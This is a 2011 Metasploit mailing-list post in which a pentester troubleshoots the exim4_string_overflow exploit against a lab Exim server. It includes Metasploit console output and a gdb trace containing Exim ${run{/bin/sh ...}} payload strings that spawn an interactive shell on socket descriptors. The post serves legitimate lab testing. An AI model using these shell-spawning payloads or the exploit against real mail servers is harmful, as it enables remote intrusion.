Metasploit mailing list archives
exim4_string_overflow
From: Paul Johnston <paul.johnston () pentest co uk>
Date: Thu, 03 Feb 2011 11:30:03 +0000
Hi, I'm having real trouble setting up a demo environment to try the exim4_string_overflow exploit against. The target OS is Oracle Enterprise Linux 5.4, running on VirtualBox. I've tried both the bundled Exim RPM and verion 4.69 compiled from source. I've disabled exec-shield and address randomizatation: [root@localhost ~]# cat /proc/sys/kernel/exec-shield 0 [root@localhost ~]# cat /proc/sys/kernel/randomize_va_space 0 When I run the exploit, the folowing happens (if I'm *NOT* tracking the process with gdb): msf exploit(exim4_string_format) > exploit [*] Started reverse double handler [*] Connecting to 192.168.3.4:25 ... [*] Server: 220 localhost ESMTP Exim 4.69 Wed, 02 Feb 2011 19:17:47 +0000 [*] EHLO: 250-localhost Hello ZtTr2Wp2.com [192.168.3.2] [*] EHLO: 250-SIZE 52428800 [*] EHLO: 250-PIPELINING [*] EHLO: 250 HELP [*] Determined our hostname is ZtTr2Wp2.com and IP address is 192.168.3.2 [*] MAIL: 250 OK [*] RCPT: 250 Accepted [*] DATA: 354 Enter message, ending with "." on a line by itself [*] Constructing initial headers ... [*] Constructing HeaderX ... [*] Constructing body ... [*] Sending 50 megabytes of data... [*] Ending first message. [-] Exploit exception: end of file reached [*] Exploit completed, but no session was created. If I do track with gdb, the flow is slightly different but the exploit still fails. gdb shows this: (gdb) c Continuing. (metasploit continues to send 50mb message) Error while mapping shared library sections: 'exec /bin/sh -i <&7 >&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&8
&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&9 >&0 2>&0'}}
${run{/bin/sh -c 'exec /bin/sh -i <&10 >&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&11 >&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&12
&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&3 >&0 2>&0'}}
${run{/bin/sh -c 'exec /bin/sh -i <&4 >&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&5 >&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i <&6 >&0 2>&0'}} ${run{/bin/sh -c 'exec /b: No such file or directory. (no debugging symbols found) Program received signal SIGABRT, Aborted. 0x007d2402 in __kernel_vsyscall () Any ideas? I'm totally stuck! Thanks, Paul -- Pentest - When a tick in the box is not enough Paul Johnston - IT Security Consultant / Tiger SST Pentest Limited - ISO 9001 (cert 16055) / ISO 27001 (cert 558982) Office: +44 (0) 161 233 0100 Mobile: +44 (0) 7817 219 072 Email policy: http://www.pentest.co.uk/legal.shtml#emailpolicy Registered Number: 4217114 England & Wales Registered Office: 26a The Downs, Altrincham, Cheshire, WA14 2PU, UK _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- exim4_string_overflow Paul Johnston (Feb 03)